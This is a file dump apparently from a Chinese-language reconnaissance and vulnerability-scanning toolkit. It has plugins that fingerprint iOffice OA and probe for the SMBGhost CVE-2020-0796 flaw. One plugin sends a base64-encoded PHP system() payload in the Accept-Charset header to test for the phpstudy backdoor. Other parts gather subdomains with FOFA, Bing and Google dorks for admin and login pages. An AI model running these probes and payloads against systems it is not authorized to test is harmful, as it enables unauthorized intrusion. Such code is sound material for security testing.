9 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
10 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
11 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
12 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
13 |
14 |
15 | # 模板
16 | class Detect(threading.Thread):
17 | name = 'CMSPRO'
18 |
19 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
20 | threading.Thread.__init__(self)
21 | self.alive_Web_queue = alive_Web_queue # 存活web的队列
22 | self.pbar = pbar # 进度条
23 | self.vul_list = vul_list # 存储漏洞的名字和url
24 | self.proxies = requests_proxies # 代理
25 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
26 |
27 | def run(self):
28 | while not self.alive_Web_queue.empty():
29 | alive_web = self.alive_Web_queue.get()
30 | self.pbar.set_postfix(url=alive_web, vul=self.name) # 进度条的显示
31 | self.run_detect(alive_web.rstrip('/'))
32 | self.pbar.update(1) # 每完成一个任务,进度条也加+1
33 | self.alive_Web_queue.task_done()
34 |
35 | # 调用各种漏洞检测方法
36 | def run_detect(self, url):
37 | # upload
38 | pass
39 |
40 |
41 | if __name__ == '__main__':
42 | from queue import Queue
43 |
44 | alive_web = ['']
45 | vul_list = []
46 | proxy = r''
47 | requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
48 | # requests_proxies = None
49 | alive_Web_queue = Queue(-1) # 将存活的web存入队列里
50 | for _ in alive_web:
51 | alive_Web_queue.put(_)
52 |
53 | threads = []
54 | thread_num = 1 # 漏洞检测的线程数目
55 |
56 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total是总数
57 |
58 | for num in range(1, thread_num + 1):
59 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
60 | threads.append(t)
61 | t.start()
62 | for t in threads:
63 | t.join()
64 |
65 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
66 | for vul in vul_list:
67 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/iOffice.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
9 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
10 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
11 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # 红帆OA
15 | class Detect(threading.Thread):
16 | name = 'iOffice'
17 |
18 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.alive_Web_queue = alive_Web_queue # 存活web的队列
21 | self.pbar = pbar # 进度条
22 | self.vul_list = vul_list # 存储漏洞的名字和url
23 | self.proxies = requests_proxies # 代理
24 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
25 |
26 | def run(self):
27 | while not self.alive_Web_queue.empty():
28 | alive_web = self.alive_Web_queue.get()
29 | self.pbar.set_postfix(url=alive_web, vul=self.name) # 进度条的显示
30 | self.run_detect(alive_web.rstrip('/'))
31 | self.pbar.update(1) # 每完成一个任务,进度条也加+1
32 | self.alive_Web_queue.task_done()
33 |
34 |
35 | # 调用各种漏洞检测方法
36 | def run_detect(self, url):
37 | iOffice_url = url + '/ioffice'
38 | try:
39 | res = requests.get(url=iOffice_url, headers=self.headers, proxies=self.proxies, verify=False, timeout=10)
40 | if res.status_code == 200 and 'iOffice.net' in res.text:
41 | tqdm.write(Fore.RED + '[iOffice] {}'.format(url))
42 | self.vul_list.append(['iOffice', url, 'Maybe'])
43 | except Exception as e:
44 | return False
45 |
46 | if __name__ == '__main__':
47 | from queue import Queue
48 |
49 | alive_web = ['']
50 | vul_list = []
51 | # proxy = r''
52 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
53 | requests_proxies = None
54 | alive_Web_queue = Queue(-1) # 将存活的web存入队列里
55 | for _ in alive_web:
56 | alive_Web_queue.put(_)
57 |
58 | threads = []
59 | thread_num = 1 # 漏洞检测的线程数目
60 |
61 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total是总数
62 |
63 | for num in range(1, thread_num + 1):
64 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
65 | threads.append(t)
66 | t.start()
67 | for t in threads:
68 | t.join()
69 |
70 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
71 | for vul in vul_list:
72 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/phpstudy.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import threading
3 | from termcolor import cprint
4 | from tqdm import *
5 | from colorama import Fore
6 |
7 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
8 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
9 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
10 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
11 |
12 |
13 | class Detect(threading.Thread):
14 | name = 'phpstudy'
15 |
16 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
17 | threading.Thread.__init__(self)
18 | self.alive_Web_queue = alive_Web_queue # 存活web的队列
19 | self.pbar = pbar # 进度条
20 | self.vul_list = vul_list # 存储漏洞的名字和url
21 | self.proxies = requests_proxies # 代理
22 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
23 |
24 | def run(self):
25 | while not self.alive_Web_queue.empty():
26 | alive_web = self.alive_Web_queue.get()
27 | self.pbar.set_postfix(url=alive_web, vul=self.name) # 进度条的显示
28 | self.run_detect(alive_web.rstrip('/'))
29 | self.pbar.update(1) # 每完成一个任务,进度条也加+1
30 | self.alive_Web_queue.task_done()
31 |
32 | # 只需要修改下面的代码就行
33 | def run_detect(self, url):
34 | headers = {'Accept-Encoding': 'gzip,deflate',
35 | 'Accept-Charset': 'c3lzdGVtKCdlY2hvIDExMTFhYWFhMTExMScpOw=='} # system('echo 1111aaaa1111');
36 | try:
37 | res = requests.get(url=url, headers=headers, allow_redirects=False, proxies=self.proxies, timeout=10)
38 | if '1111aaaa1111' in res.text:
39 | tqdm.write(Fore.RED + '[phpstudy] {}'.format(url))
40 | self.vul_list.append(['phpstudy', url, 'YES'])
41 | else:
42 | pass
43 | # print('[phpstudy -] {}'.format(url))
44 | except Exception as e:
45 | pass
46 | # print('[phpstudy error] {}: {}'.format(url, e.args))
47 |
48 | if __name__ == '__main__':
49 | from queue import Queue
50 |
51 | alive_web = ['']
52 | vul_list = []
53 | proxy = r''
54 | requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
55 | # requests_proxies = None
56 | alive_Web_queue = Queue(-1) # 将存活的web存入队列里
57 | for _ in alive_web:
58 | alive_Web_queue.put(_)
59 |
60 | threads = []
61 | thread_num = 1 # 漏洞检测的线程数目
62 |
63 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total是总数
64 |
65 | for num in range(1, thread_num + 1):
66 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
67 | threads.append(t)
68 | t.start()
69 | for t in threads:
70 | t.join()
71 |
72 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
73 | for vul in vul_list:
74 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Win/CVE_2020_0796.py:
--------------------------------------------------------------------------------
1 | import threading
2 | from termcolor import cprint
3 | import socket
4 | import struct
5 | import socks
6 | from queue import Queue
7 |
8 | pkt = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
9 |
10 | class Detect(threading.Thread):
11 | name = 'CVE-2020-0796'
12 |
13 | def __init__(self, alive_host_queue, vul_list, proxy):
14 | threading.Thread.__init__(self)
15 | self.alive_host_queue = alive_host_queue # 存活主机的队列
16 | self.vul_list = vul_list # 存储漏洞的名字和url
17 | self.setProxy(proxy)
18 |
19 | def setProxy(self, proxy):
20 | if proxy:
21 | socks.set_default_proxy(socks.SOCKS5, proxy.split(':')[0], int(proxy.split(':')[1])) # 设置socks代理
22 | socket.socket = socks.socksocket # 必须得有,否则代理不进去
23 | socket.setdefaulttimeout(0.01) # 0.01恰好
24 |
25 | def run(self):
26 | while not self.alive_host_queue.empty():
27 | alive_host = self.alive_host_queue.get() # 127.0.0.1
28 | self.run_detect(alive_host)
29 |
30 | # 只需要修改下面的代码就行
31 | def run_detect(self, ip):
32 | sock = socket.socket(socket.AF_INET)
33 | sock.settimeout(3)
34 |
35 | try:
36 | sock.connect((str(ip), 445))
37 | sock.send(pkt)
38 |
39 | nb, = struct.unpack(">I", sock.recv(4))
40 | res = sock.recv(nb)
41 |
42 | if res[68:70] != b"\x11\x03" or res[70:72] != b"\x02\x00":
43 | pass
44 | else:
45 | cprint('[CVE-2020-0796] {}'.format(ip), 'red')
46 | self.vul_list.append(['CVE-2020-0796', ip, 'Yes'])
47 | except:
48 | sock.close()
49 |
50 |
51 |
52 | if __name__ == '__main__':
53 | from queue import Queue
54 | alive_host = ['192.168.168.148']
55 | vul_list = []
56 | proxy = "1.1.1.1:1111"
57 |
58 |
59 | alive_host_queue = Queue(-1) # 将存活的web存入队列里
60 | for _ in alive_host:
61 | alive_host_queue.put(_)
62 |
63 | threads = []
64 | thread_num = 1 # 漏洞检测的线程数目
65 | for num in range(1, thread_num + 1):
66 | t = Detect(alive_host_queue, vul_list, proxy) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
67 | threads.append(t)
68 | t.start()
69 | for t in threads:
70 | t.join()
71 |
72 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Win/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Win/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/__init__.py
--------------------------------------------------------------------------------
/Plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/Intranet/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/Intranet/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/Intranet/scanPort/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/Intranet/scanPort/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/ParamSpider/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/ParamSpider/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/SocksProxy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/SocksProxy/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/WebspaceSearchEngine/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/WebspaceSearchEngine/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/WebspaceSearchEngine/fofaApi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import base64
3 | import json
4 | import configparser
5 |
6 |
7 | # 域名查询语句domain="xxx.com"
8 | # c段查询语句ip="xxx.xxx.xxx.0/24"
9 | # query = r'domain="xxx.com"'
10 | # query = r'ip="xxx.xxx.xxx.0/24"'
11 |
12 | cf = configparser.ConfigParser()
13 | cf.read("./iniFile/config.ini")
14 | secs = cf.sections()
15 | email = cf.get('fofa api', 'EMAIL')
16 | key = cf.get('fofa api', 'KEY')
17 |
18 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
19 |
20 | size = 10000
21 | page = 1
22 |
23 | def query_ip(c_subnet):
24 | print('[fofa] 查询:{}'.format(c_subnet))
25 | return query(c_subnet)
26 |
27 | def query_domain(query_str):
28 | print('[fofa] 查询:{}'.format(query_str))
29 | return query(query_str)
30 |
31 | # 过滤出web服务
32 | def filter_web(result):
33 |
34 | host, title, ip, domain, port, server, protocol, address = result
35 |
36 | # 返回开放http服务的ip和端口
37 | if 'http' in protocol or protocol == '':
38 | web_host_port = '{}'.format(host) # web服务, host是IP:PORT
39 | return True, web_host_port
40 | else: # 其他非web服务
41 | return False, [protocol, ip, int(port)]
42 |
43 |
44 | def query(query_str):
45 | fofa_web_host_port = [] # 存放开放web服务器的ip/domain和port,用来后面的cms识别
46 | fofa_service_host_port = [] # 存放非Web服务器的ip/domain和port,用来后面的未授权漏洞检测
47 |
48 | qbase64 = str(base64.b64encode(query_str.encode(encoding='utf-8')), 'utf-8')
49 | url = r'https://fofa.info/api/v1/search/all?email={}&key={}&qbase64={}&size={}&page={}&fields=host,title,ip,domain,port,server,protocol,city'.format(email, key, qbase64, size, page)
50 | try:
51 | ret = json.loads(requests.get(url=url, headers=headers, timeout=10, verify=False).text)
52 | fofa_Results = ret['results']
53 | for result in fofa_Results:
54 | isWeb, host_port = filter_web(result)
55 | if isWeb:
56 | fofa_web_host_port.append(host_port)
57 | else:
58 | fofa_service_host_port.append(host_port)
59 | return fofa_Results, fofa_web_host_port, fofa_service_host_port
60 |
61 | except Exception as e:
62 | print('[error] fofa 查询 {} : {}'.format(query_str, e.args))
63 | return [], [], []
64 |
65 |
--------------------------------------------------------------------------------
/Plugins/infoGather/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Aiqicha/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Aiqicha/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CDN/GeoLite2-ASN.mmdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/CDN/GeoLite2-ASN.mmdb
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CDN/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/CDN/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CSubnet/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/CSubnet/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CSubnet/demo.py:
--------------------------------------------------------------------------------
1 |
2 | def filter_internal_ip(ip_subnet):
3 | ip_subnet_list = ip_subnet.split('.')
4 | if ip_subnet_list[0] == '10' or '127':
5 | return None
6 | elif ip_subnet_list[0] == '172' and 15 < int(ip_subnet_list[1]) < 32:
7 | return None
8 | elif ip_subnet_list[0] == '192' and ip_subnet_list[1] == '168':
9 | return None
10 | else:
11 | return ip_subnet
12 |
13 |
14 | for _ in ['10.0.0', '1.1.1', '192.168', '172.16.1', '172.14.2']:
15 | ip_subnet = filter_internal_ip(_)
16 | print(ip_subnet)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Certs/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Certs/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Certs/crawlCerts.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import ssl
3 | from queue import Queue
4 | from threading import Thread
5 |
6 | # 抓取https域名的证书dns信息
7 | class crawlCerts:
8 | def __init__(self, domain, subdomains):
9 | self.domain = domain
10 | self._domain = domain.split('.')[0]
11 | self.newDomains = []
12 | self.subdomains = subdomains
13 | self.subdomains_Queue = Queue(-1)
14 | self.TIMEOUT = 10 # sockets超时
15 | self.threadsNum = 20
16 | self.threads = [] # 存放多线程
17 |
18 | self.cacert_path = r'./Plugins/infoGather/subdomain/Certs/cacert.pem'
19 | # self.cacert_path = r'../../../../Plugins/infoGather/subdomain/Certs/cacert.pem' # 测试用
20 | self.certsSubdomains = [] # 存放子域名
21 | self.trustedDomainDict = {} # key为子域名,value为证书信息
22 |
23 | def run(self):
24 | for _ in self.subdomains:
25 | self.subdomains_Queue.put(_)
26 |
27 | for i in range(1, self.threadsNum + 1):
28 | t = Thread(target=self.craw_certs)
29 | self.threads.append(t)
30 | t.start()
31 | for t in self.threads:
32 | t.join()
33 |
34 | return list(set(self.certsSubdomains)), self.trustedDomainDict, list(set(self.newDomains))
35 |
36 | def craw_certs(self):
37 | while not self.subdomains_Queue.empty():
38 | subdomain = self.subdomains_Queue.get()
39 | print('req certs -> {}'.format(subdomain))
40 | try:
41 | s = socket.socket()
42 | s.settimeout(self.TIMEOUT)
43 | c = ssl.wrap_socket(s, cert_reqs=ssl.CERT_REQUIRED, ca_certs=self.cacert_path)
44 | c.settimeout(10)
45 | c.connect((subdomain, 443))
46 | cert = c.getpeercert()
47 | dns_domains = [each[1] for each in cert['subjectAltName']]
48 | for trustedDomain in dns_domains:
49 | print("[{}] Found Trusted Domains [{}]".format(subdomain, trustedDomain))
50 | if self._domain in trustedDomain:
51 | self.certsSubdomains.append(trustedDomain.strip('*.'))
52 | if '.{}'.format(self.domain) not in trustedDomain:
53 | self.newDomains.append(trustedDomain.strip('*.'))
54 | self.trustedDomainDict[subdomain] = dns_domains
55 |
56 | except Exception as e:
57 | pass
58 | # print(e.args)
59 | #print(" [-] %s" % (subdomain))
60 |
61 |
62 | if __name__ == '__main__':
63 | domain = ''
64 | subdomains = ['']
65 | certsSubdomains, trustedDomainDict, newDomains = crawlCerts(domain, subdomains).run()
66 | print(certsSubdomains)
67 | print(trustedDomainDict)
68 | print(newDomains)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/FriendChins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/FriendChins/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Baidu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/Baidu/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Bing/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/Bing/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Bing/bing.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | from urllib.parse import quote, urlparse
4 | import threading
5 | from queue import Queue
6 | from IPy import IP
7 | from bs4 import BeautifulSoup
8 |
9 | # 必应爬虫
10 | class BingSpider:
11 | def __init__(self):
12 | self.headers = {
13 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
14 | # site:domain inurl:admin inurl:login inurl:system 后台 系统
15 | self.wds = ['admin', 'login', 'system', 'register', 'upload', '后台', '系统', '登录']
16 | self.PAGES = 5 # 默认跑5页
17 | # print('Please wait a few time ...')
18 | self.TIMEOUT = 10
19 | self.bingSubdomains = []
20 | self.links = []
21 | def get_subdomain(self, host, each_wd, i): # host 既可以是域名也可以是IP
22 | for page in range(1, self.PAGES + 1):
23 | q = 'site:{} {}'.format(host, each_wd)
24 | print('[{}] -> [page: {}]'.format(q, page))
25 | tmp = page - 2
26 | if tmp == -1:
27 | first_value = 1
28 | elif tmp == 0:
29 | first_value = 2
30 | else:
31 | first_value = tmp * 10 + 2
32 | url = r'https://www.bing.com/search?q={}&first={}'.format(quote(q), first_value)
33 | print(url)
34 | try:
35 | res = requests.get(url=url, headers=self.headers, timeout=10)
36 | soup = BeautifulSoup(res.text, 'html.parser')
37 | lis = soup.find_all('li', class_='b_algo')
38 | for li in lis:
39 | li_a = li.find('a')
40 | link = li_a['href'] # 链接
41 | title = li_a.get_text() # 标题
42 | subdomain = urlparse(link).netloc # 子域名
43 | print('[{}] [page: {}]: {} {} {}'.format(q, page, link, title, subdomain))
44 | self.bingSubdomains.append(subdomain)
45 | self.links.append([each_wd, link, title])
46 | except Exception as e:
47 | print(e.args)
48 | # pass
49 | # 爬子域名
50 | def run_subdomain(self, domain):
51 | threads = []
52 | for i in range(len(self.wds)):
53 | t = threading.Thread(target=self.get_subdomain, args=(domain, self.wds[i], i))
54 | threads.append(t)
55 | t.start()
56 | for t in threads:
57 | t.join()
58 |
59 | return list(set(self.bingSubdomains)), self.links
60 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/.google-cookie:
--------------------------------------------------------------------------------
1 | #LWP-Cookies-2.0
2 | Set-Cookie3: 1P_JAR="2018-12-22-18"; path="/"; domain=".google.com"; path_spec; domain_dot; expires="2019-01-21 18:25:18Z"; version=0
3 | Set-Cookie3: NID="150=A24IhlWFjJMC6YrDdWBm7lUzkeFRQP9XZyslXht-_MAATs-ObZNNNAeI7BTsTtrLA57lsPgNaTqhME6FZXF5S2eaN-wdcQVmx8w0jH26st6IGsYtLcd9x-f9CGr7z7Pii0vY1p6tuO6dD-uFvAvwzqvqankbun2icE5oZ7ogQfM"; path="/"; domain=".google.com"; path_spec; domain_dot; expires="2019-06-19 12:27:28Z"; HttpOnly=None; version=0
4 | Set-Cookie3: CGIC=""; path="/complete/search"; domain=".google.com"; path_spec; domain_dot; expires="2019-06-19 03:22:04Z"; HttpOnly=None; version=0
5 | Set-Cookie3: CGIC=""; path="/search"; domain=".google.com"; path_spec; domain_dot; expires="2019-06-19 03:22:04Z"; HttpOnly=None; version=0
6 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/.travis.yml:
--------------------------------------------------------------------------------
1 | language: python
2 |
3 | # Supported CPython versions:
4 | # https://en.wikipedia.org/wiki/CPython#Version_history
5 | python:
6 | - pypy3
7 | - pypy
8 | - 2.7
9 | - 3.6
10 | - 3.5
11 | - 3.4
12 |
13 | # Use container-based infrastructure
14 | sudo: false
15 |
16 | install:
17 | - pip install pycodestyle pyflakes
18 |
19 | script:
20 | # Static analysis
21 | - pyflakes .
22 | - pycodestyle --statistics --count .
23 |
24 | matrix:
25 | fast_finish: true
26 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/demo.py:
--------------------------------------------------------------------------------
1 | from googlesearch import search
2 | import sys
3 | from sys import version_info
4 |
5 | PY2, PY3 = (True, False) if version_info[0] == 2 else (False, True)
6 |
7 | if PY2:
8 | from urlparse import urlparse
9 | else:
10 | from urllib.parse import urlparse
11 |
12 | key = 'site:hbu.edu.cn 后台'# sys.argv[1]
13 |
14 | urls = []
15 |
16 | for each_result in search(key, stop=4):
17 | parseRet = urlparse(each_result)
18 | print(each_result, parseRet)
19 | url = parseRet.scheme + '://' + parseRet.netloc
20 | if key in parseRet.netloc and url not in urls:
21 | print(url, each_result)
22 | urls.append(url)
23 |
24 | print('search {} Done!'.format(key))
25 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/.gitignore:
--------------------------------------------------------------------------------
1 | _build/
2 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/Makefile:
--------------------------------------------------------------------------------
1 | # Minimal makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line.
5 | SPHINXOPTS =
6 | SPHINXBUILD = sphinx-build
7 | SPHINXPROJ = googlesearch
8 | SOURCEDIR = .
9 | BUILDDIR = _build
10 |
11 | # Put it first so that "make" without argument is like "make help".
12 | help:
13 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
14 |
15 | .PHONY: help Makefile
16 |
17 | # Catch-all target: route all unknown targets to Sphinx using the new
18 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
19 | %: Makefile
20 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/index.rst:
--------------------------------------------------------------------------------
1 | .. googlesearch documentation master file, created by
2 | sphinx-quickstart on Tue Nov 6 12:25:12 2018.
3 | You can adapt this file completely to your liking, but it should at least
4 | contain the root `toctree` directive.
5 |
6 | Welcome to googlesearch's documentation!
7 | ========================================
8 |
9 | Indices and tables
10 | ==================
11 |
12 | * :ref:`genindex`
13 | * :ref:`modindex`
14 | * :ref:`search`
15 |
16 | Reference
17 | =========
18 |
19 | .. automodule:: googlesearch
20 | :members:
21 |
22 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | pushd %~dp0
4 |
5 | REM Command file for Sphinx documentation
6 |
7 | if "%SPHINXBUILD%" == "" (
8 | set SPHINXBUILD=sphinx-build
9 | )
10 | set SOURCEDIR=.
11 | set BUILDDIR=_build
12 | set SPHINXPROJ=googlesearch
13 |
14 | if "%1" == "" goto help
15 |
16 | %SPHINXBUILD% >NUL 2>NUL
17 | if errorlevel 9009 (
18 | echo.
19 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
20 | echo.installed, then set the SPHINXBUILD environment variable to point
21 | echo.to the full path of the 'sphinx-build' executable. Alternatively you
22 | echo.may add the Sphinx directory to PATH.
23 | echo.
24 | echo.If you don't have Sphinx installed, grab it from
25 | echo.http://sphinx-doc.org/
26 | exit /b 1
27 | )
28 |
29 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
30 | goto end
31 |
32 | :help
33 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
34 |
35 | :end
36 | popd
37 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/google.py:
--------------------------------------------------------------------------------
1 | from Spider.Google.googlesearch import search
2 | from sys import version_info
3 |
4 | PY2, PY3 = (True, False) if version_info[0] == 2 else (False, True)
5 |
6 | if PY2:
7 | from urlparse import urlparse
8 | else:
9 | from urllib.parse import urlparse
10 |
11 | # 谷歌爬虫
12 | class GoogleSpider:
13 | def __init__(self, domain, save_fold_path):
14 | self.domain = domain
15 | # site:domain inurl:admin inurl:login inurl:system 后台 系统
